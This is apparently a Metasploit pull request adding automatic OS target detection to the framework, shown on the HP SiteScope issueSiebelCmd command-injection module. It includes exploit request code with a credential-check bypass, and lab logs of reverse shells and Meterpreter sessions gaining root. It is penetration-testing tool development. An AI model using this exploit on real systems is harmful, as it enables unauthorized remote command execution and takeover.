### PR TITLE
Auto target auto detection capability on aggressive exploits, more realistic multi-platform support

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -155,6 +155,7 @@ class Exploit
       if(e.class.to_s != 'Msf::OptionValidateError')
         print_error("Call stack:")
         e.backtrace.each do |line|
+          break if line =~ /lib.msf.base.simple/
           print_error("  #{line}")
         end
       end

--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -103,6 +103,37 @@ class Exploit
       end
     end
 
+    # If possible, uses the exploit module target detection to pick up the
+    # correct one before choosing the payload
+    begin
+      target_idx = get_auto_target(mod)
+    rescue ::Interrupt
+      raise $!
+    rescue Msf::OptionValidateError => e
+      print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
+      # Has no sense to continue if the module options don't validate,
+      # the module will fail later anyway.
+      return
+    rescue ::Exception => e
+      # Warn about other exceptions, but allow exploit_cmd to continue
+      # its job. Before this modification, the job would continue
+      # anyway.
+      print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
+      print_error("Call stack:")
+      e.backtrace.each do |line|
+        print_error("  #{line}")
+      end
+    end
+
+    if target_idx
+      target = target_idx
+      mod.datastore['TARGET'] = target_idx
+      # If the module is using its target detection capabilities the payload
+      # on the datastore is probably wrong, we need to select a compatible
+      # one.
+      payload = nil
+    end
+
     if not payload
       payload = Exploit.choose_payload(mod, target)
     end
@@ -124,7 +155,6 @@ class Exploit
       if(e.class.to_s != 'Msf::OptionValidateError')
         print_error("Call stack:")
         e.backtrace.each do |line|
-          break if line =~ /lib.msf.base.simple/
           print_error("  #{line}")
         end
       end
@@ -239,6 +269,39 @@ class Exploit
       end
     end
     return
+  end
+
+  private
+
+  # Returns the target detected by the exploit module.
+  # The only exploits able to detect his own target are the ones accomplishing
+  # all the next requirements:
+  # * Aggressive.
+  # * Have target including the option { :auto_target => true }
+  # * Have an auto_target method which returns the index of the
+  #   detected target.
+  #
+  # @param mod [Msf::Module::Exploit] the exploit module to detect target for.
+  # @return [Fixnum] the index of the detected target.
+  # @return [nil] if the exploit isn't able to detect the target.
+  # @raise [OptionValidateError] raised if the exploit module fails to validate
+  #   the options.
+  # @raise [Interrupt] raised if the user interrupts while the detection is
+  #   running.
+  # @raise [Exception] raised by the exploit module while trying to detect the
+  #   target.
+  def get_auto_target(mod)
+    unless mod.aggressive? and mod.target and mod.target[:auto_target] and mod.respond_to?(:auto_target)
+      return nil
+    end
+
+    mod.options.validate(mod.datastore)
+    target_idx = mod.auto_target
+    if target_idx and target_idx.kind_of?(::Fixnum) and target_idx.between?(0, mod.targets.length)
+      return target_idx
+    end
+
+    return nil
   end
 
 end

--- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
+++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
@@ -104,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     case res.body
-      when /WIN/i
-        return 1
-      when /Linux/i
-        return 2
-      else
-        return nil
+    when /WIN/i
+      return 1
+    when /Linux/i
+      return 2
+    else
+      return nil
     end
   end
 

--- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
+++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'rexml/document'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = GreatRanking
+  Rank = ExcellentRanking
 
   HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
 
@@ -47,6 +47,11 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'     =>
         [
+          [ 'Automatic',
+            {
+              :auto_target => true
+            }
+          ],
           [ 'HP SiteScope 11.20 / Windows',
             {
               'Arch' => ARCH_X86,
@@ -77,10 +82,41 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
+  def send_soap_request(soap_data, timeout = 20)
+    res = send_request_cgi({
+      'uri'      => normalize_uri(target_uri.path, 'services', 'APISiteScopeImpl'),
+      'method'   => 'POST',
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'data'     => soap_data, # To avoid rexml html encoding
+      'headers'  => {
+        'SOAPAction' => '""'
+      }
+    }, timeout)
+
+    return res
+  end
+
+  def auto_target
+    res = send_soap_request(get_soap_request_info)
+
+    unless res and res.code == 200 and (res.body.to_s =~ /osType/ or res.body.to_s =~ /osVersion/)
+      return nil
+    end
+
+    case res.body
+      when /WIN/i
+        return 1
+      when /Linux/i
+        return 2
+      else
+        return nil
+    end
+  end
+
   def check
     value = rand_text_alpha(8 + rand(10))
 
-    res = send_soap_request(value)
+    res = send_soap_request(get_soap_request.gsub(/MSF_COMMAND/, value))
 
     if res and res.code == 500 and res.body.to_s =~ /Cmd Error: User and Password must be specified/
       return Exploit::CheckCode::Appears
@@ -113,7 +149,8 @@ class Metasploit3 < Msf::Exploit::Remote
       command << " /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing
     end
 
-    res = send_soap_request(command, opts[:http_timeout] || 20)
+    res = send_soap_request(get_soap_request.gsub(/MSF_COMMAND/, command),
+                             opts[:http_timeout] || 20)
 
     return if target.name =~ /Linux/ # There isn't response with some ARCH_CMD payloads
 
@@ -122,43 +159,42 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def get_soap_request
+  def get_soap_request_info
     xml = Document.new
-    xml.add_element(
-        "soapenv:Envelope",
-        {
-            'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
-            'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
-            'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
-            'xmlns:api'     => "http://Api.freshtech.COM"
-        })
+    xml.add_element("soapenv:Envelope", {
+      'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
+      'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
+      'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+      'xmlns:api'     => "http://Api.freshtech.COM"
+    })
     xml.root.add_element("soapenv:Header")
     xml.root.add_element("soapenv:Body")
     body = xml.root.elements[2]
-    body.add_element(
-        "api:issueSiebelCmd",
-        {
-            'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
-        })
+    body.add_element("api:getSiteScopeInfo", {
+      'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+    })
+    xml.to_s
+  end
+
+  def get_soap_request
+    xml = Document.new
+    xml.add_element("soapenv:Envelope", {
+      'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
+      'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
+      'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+      'xmlns:api'     => "http://Api.freshtech.COM"
+    })
+    xml.root.add_element("soapenv:Header")
+    xml.root.add_element("soapenv:Body")
+    body = xml.root.elements[2]
+    body.add_element("api:issueSiebelCmd", {
+      'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+    })
     ser = body.elements[1]
     ser.add_element("in0", {'xsi:type' => 'xsd:string'})
     ser.elements['in0'].text = "MSF_COMMAND"
 
     xml.to_s
-  end
-
-  def send_soap_request(command, timeout = 20)
-    res = send_request_cgi({
-      'uri'      => normalize_uri(target_uri.path, 'services', 'APISiteScopeImpl'),
-      'method'   => 'POST',
-      'ctype'    => 'text/xml; charset=UTF-8',
-      'data'     => get_soap_request.gsub(/MSF_COMMAND/, command), # To avoid rexml html encoding
-      'headers'  => {
-        'SOAPAction' => '""'
-      }
-    }, timeout)
-
-    return res
   end
 
 end


### PR DESCRIPTION
This pull request tries to add a more realistic multi-platform exploits support, with a very important requirement: minimize modifications of the current logic / behaviout in the framework
- It only works for Aggressive exploits, Passive expoits (browser exploits for example) don't benefit of this change.
- The responsability to add the auto detection code is of the module.
- The cmd_exploit handler will try to execute the platform auto detection code (from the module) before choosing
  a payload and calling to exploit_simple. I think this is the way to minimize impact into the framework, but feedback is super welcome, of course.
- The cmd_exploit only will try to auto detect target when the module defines an Automatic target, with an ":auto_target" option, this target is set (or set as default and no target selected), and the module provides an "auto_target" method.
- In order to minimize modifications on the framework, the Exploit CommandDispatcher needs to modify the mod.datastore['TARGET'] if auto_target is used and a target is found. It is important to update the datastore option because the module will use it later every time tries to access the "target". In this way only code additions. No need to modify actual code. On the other hand the CommandDispatcher modifies datastore options where choosing the payload, so hope it is good enough. Anyway discussion is super welcome!
- The framework code I've added is documented, so I think it's better to read it than repeat every step here :) Feel free to add comments, ask me directly if there are doubts/comments.

This pull request adds the necessary code into the framework, and modifies a module to test the change on a real module. In order to build vulnerable environments for the module use the steps documented on #2786

On the other side, it is important code framework, **so it requires carefully review, and discussion!!!**\* I can be forgetting something important on these modifications, so feel free to criticize! Indeed I won't be hurt if this pull request isn't landed finally. I'm just trying to learn the secrets of the framework =)
# Verification
## Usage
- [ ] Run the msfconsole
- [ ] use exploit/multi/http/hp_sitescope_issuesiebelcmd
- [ ] show targets, verity there are three targets, and one of them is automatic

```
msf exploit(hp_sitescope_issuesiebelcmd) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   HP SiteScope 11.20 / Windows
   2   HP SiteScope 11.20 / Linux
```
- [ ] show options, verify the target by default is automatic:

```
msf exploit(hp_sitescope_issuesiebelcmd) > show options

Module options (exploit/multi/http/hp_sitescope_issuesiebelcmd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /SiteScope/      yes       Path to SiteScope
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic

```
- [ ] set rhost [linux_target_host]
- [ ] exploit
- [ ] Verify you get a session

```
msf exploit(hp_sitescope_issuesiebelcmd) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(hp_sitescope_issuesiebelcmd) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:8080 - Executing payload...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.133:39924) at 2013-12-27 16:59:41 -0600

id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
```
- [ ] show options, verify the linux target and a compatible payload has been automatically selected

```
msf exploit(hp_sitescope_issuesiebelcmd) > show options

Module options (exploit/multi/http/hp_sitescope_issuesiebelcmd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.172.133  yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /SiteScope/      yes       Path to SiteScope
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   HP SiteScope 11.20 / Linux
```
- [ ] set target 0 (automatic target again)
- [ ] set rhost <host_windows>
- [ ] exploit
- [ ] Verify windows target is detected and a new session is got

```
msf exploit(hp_sitescope_issuesiebelcmd) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(hp_sitescope_issuesiebelcmd) > set target 0
target => 0
msf exploit(hp_sitescope_issuesiebelcmd) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Delivering payload...
[*] Command Stager progress -   7.92% done (7999/101010 bytes)
[*] Command Stager progress -  15.84% done (15998/101010 bytes)
[*] Command Stager progress -  23.76% done (23997/101010 bytes)
[*] Command Stager progress -  31.68% done (31996/101010 bytes)
[*] Command Stager progress -  39.60% done (39995/101010 bytes)
[*] Command Stager progress -  47.51% done (47994/101010 bytes)
[*] Command Stager progress -  55.43% done (55993/101010 bytes)
[*] Command Stager progress -  63.35% done (63992/101010 bytes)
[*] Command Stager progress -  71.27% done (71991/101010 bytes)
[*] Command Stager progress -  79.19% done (79990/101010 bytes)
[*] Command Stager progress -  87.11% done (87989/101010 bytes)
[*] Command Stager progress -  95.03% done (95988/101010 bytes)
[*] Sending stage (769024 bytes) to 192.168.172.136
[*] Command Stager progress - 100.01% done (101016/101010 bytes)
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.136:1578) at 2013-12-27 17:00:55 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit
```
- [ ] show options, verify the windows target, and a windows payload have been automatically set

```
msf exploit(hp_sitescope_issuesiebelcmd) > show options

Module options (exploit/multi/http/hp_sitescope_issuesiebelcmd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.172.136  yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /SiteScope/      yes       Path to SiteScope
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   HP SiteScope 11.20 / Windows
```
- [ ] set target 2 (linux)
- [ ] set rhost <linux_hos>
- [ ] exploit
- [ ] VERIFY which an error because of an incompatible payload is show

```
msf exploit(hp_sitescope_issuesiebelcmd) > set target 2
target => 2
msf exploit(hp_sitescope_issuesiebelcmd) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(hp_sitescope_issuesiebelcmd) > exploit

[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
```
- [ ] set payload [tab][tab]
- [ ] Verify which compatible (linux target) payloads are show

```
msf exploit(hp_sitescope_issuesiebelcmd) > set payload cmd/unix/
set payload cmd/unix/bind_awk                 set payload cmd/unix/reverse_openssl
set payload cmd/unix/bind_perl                set payload cmd/unix/reverse_perl
set payload cmd/unix/bind_perl_ipv6           set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_awk              set payload cmd/unix/reverse_python
set payload cmd/unix/reverse_bash             set payload cmd/unix/reverse_python_ssl
set payload cmd/unix/reverse_bash_telnet_ssl  
```
- [ ] set payload cmd/unix/reverse_perl
- [ ] exploit
- [ ] VERIFY a session is got

```
msf exploit(hp_sitescope_issuesiebelcmd) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:8080 - Executing payload...
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.133:39925) at 2013-12-27 17:11:19 -0600

id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
^C
```
## Exceptions
- [ ] Run msfconsole
- [ ] use exploit/multi/http/hp_sitescope_issuesiebelcmd
- [ ] set target 0 (Automatic)
- [ ] set rhost "" (empty)
- [ ] exploit
- [ ] VERIFY there is handled Exploit Exception, there is no call stack, and the module doesn't continue:

```
msf exploit(hp_sitescope_issuesiebelcmd) > set rhost ""
rhost => 
msf exploit(hp_sitescope_issuesiebelcmd) > exploit
[-] Exploit exception (multi/http/hp_sitescope_issuesiebelcmd): Msf::OptionValidateError The following options failed to validate: RHOST.
msf exploit(hp_sitescope_issuesiebelcmd) > 
```
- [ ] set rhost <non existant ip>
- [ ] exploit  
- [ ] verify there is an Exploit Exception while verification, the call stack IS hown  because of HostUnreachable, but the module tries to continue anyway!

```
msf exploit(hp_sitescope_issuesiebelcmd) > exploit
[-] Exploit exception (multi/http/hp_sitescope_issuesiebelcmd): Rex::HostUnreachable The host (192.168.172.144:8080) was unreachable.
[-] Call stack:
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/socket/comm/local.rb:294:in `rescue in create_by_type'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/socket/comm/local.rb:274:in `create_by_type'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/socket/comm/local.rb:33:in `create'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/socket.rb:47:in `create_param'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/socket/tcp.rb:37:in `create_param'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/socket/tcp.rb:28:in `create'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/proto/http/client.rb:182:in `connect'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/proto/http/client.rb:248:in `send_request'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/proto/http/client.rb:234:in `_send_recv'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/proto/http/client.rb:215:in `send_recv'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/core/exploit/http/client.rb:280:in `send_request_cgi'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb:94:in `send_soap_request'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb:100:in `auto_target'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:299:in `get_auto_target'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:109:in `cmd_exploit'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'
[-]   ./msfconsole:148:in `<main>'

[*] Started reverse handler on 192.168.172.1:4444 
^C[*] Exploit completed, but no session was created.
```
## Additional Tests
- [ ] Additionally, feel free to try any existent module, if any existent module doesn't prior to this pull request, it is an stopper and should be reviewd.
